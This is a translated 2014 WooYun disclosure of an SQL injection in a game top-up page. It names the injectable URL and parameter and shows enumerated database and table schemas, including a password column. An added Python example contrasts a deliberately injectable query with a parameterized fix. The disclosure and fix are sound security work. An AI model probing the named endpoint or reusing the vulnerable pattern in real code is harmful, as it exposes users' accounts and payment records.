
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-067352

Title: SQL injection vulnerability in the Zhejiang Yinxiang (浙江印象) top-up page

Vendor: jhreal.com

Author: jaffer

Submitted: 2014-07-04 11:42

Fixed: 2014-08-18 11:46

Published: 2014-08-18 11:46

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-07-04: Details sent to the vendor; awaiting vendor response
2014-07-04: Vendor confirmed; details disclosed to the vendor only
2014-07-14: Details disclosed to core white hats and domain experts
2014-07-24: Details disclosed to regular white hats
2014-08-03: Details disclosed to intern white hats
2014-08-18: Details disclosed to the public

Brief description:

As the title says.

Detailed description:

Injection point:

http://pay.5see.com/Pay/LyPay?gameid=wycq


Databases:

available databases [3]:
[*] information_schema
[*] test
[*] vxgametv


Database: vxgametv
[390 tables]


A few of the tables:

Database: vxgametv
Table: member_qq
[5 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| createtime | timestamp |
| pwd | varchar(64) |
| qqopenid | varchar(32) |
| src_type | varchar(20) |
| useridx | bigint(22) |
+------------+-------------+


Database: vxgametv
Table: bill
[13 columns]
+----------+---------------+
| Column | Type |
+----------+---------------+
| Amount | decimal(18,2) |
| b_id | int(11) |
| billno | varchar(50) |
| cardtype | varchar(10) |
| coin | bigint(20) |
| date | char(14) |
| kbillno | varchar(30) |
| masterid | varchar(20) |
| Memo | varchar(255) |
| paydate | datetime |
| PayWay | varchar(20) |
| succ | varchar(1) |
| UserID | varchar(20) |
+----------+---------------+

Proof of vulnerability:

I only ran a quick test.

[Screenshot: 14.jpg]

[Screenshot: 111.jpg]

There is far too much information exposed here; please fix it quickly, or the problem will get serious.

Fix proposal:
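The report leaves the fix section empty. As an added illustration (not code from the report or from the vendor; the site's real backend is not on the page), the Python below shows the pattern that makes a request parameter such as `gameid` injectable, next to the parameterized, allow-listed replacement. The `ly_games` table layout and its sample rows are assumptions constructed for the demo; the dump lists a table by that name but not its schema.

```python
import re
import sqlite3

# Constructed stand-in for a game lookup behind a top-up page such as
# /Pay/LyPay?gameid=...  The real backend is not on the page; the table layout
# and sample rows below are assumptions for illustration only.
SAMPLE_GAMES = [
    ("wycq", "Game A", 1),
    ("xyz", "Game B", 1),
    ("old", "Game C", 0),  # disabled game, must never be returned
]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ly_games (gameid TEXT, name TEXT, enabled INTEGER)")
    conn.executemany("INSERT INTO ly_games VALUES (?, ?, ?)", SAMPLE_GAMES)
    return conn


def lookup_game_vulnerable(conn, gameid):
    """Anti-pattern: the request parameter is spliced into the SQL text.

    A quote in the input closes the literal early, so whatever follows is parsed
    as SQL and can change the WHERE clause so that rows other than the requested
    game come back.
    """
    sql = ("SELECT gameid, name FROM ly_games "
           "WHERE gameid = '" + gameid + "' AND enabled = 1")
    return conn.execute(sql).fetchall()


# Allow-list for the identifier shape: short lower-case alphanumerics/underscore.
GAMEID_RE = re.compile(r"[a-z0-9_]{1,32}")


def lookup_game_safe(conn, gameid):
    """Hardened version: validate the shape, then bind the value as a parameter.

    The driver ships the value separately from the SQL text, so it is only ever
    compared against the column and never parsed as SQL.
    """
    if not GAMEID_RE.fullmatch(gameid):
        raise ValueError("invalid gameid")
    sql = "SELECT gameid, name FROM ly_games WHERE gameid = ? AND enabled = 1"
    return conn.execute(sql, (gameid,)).fetchall()
```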

Copyright notice: please credit the source when republishing: jaffer@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 18

Confirmed: 2014-07-04 12:13

Vendor reply:

Submitted to the relevant staff for fixing; we have never paid much attention to injection.

Latest status:

None yet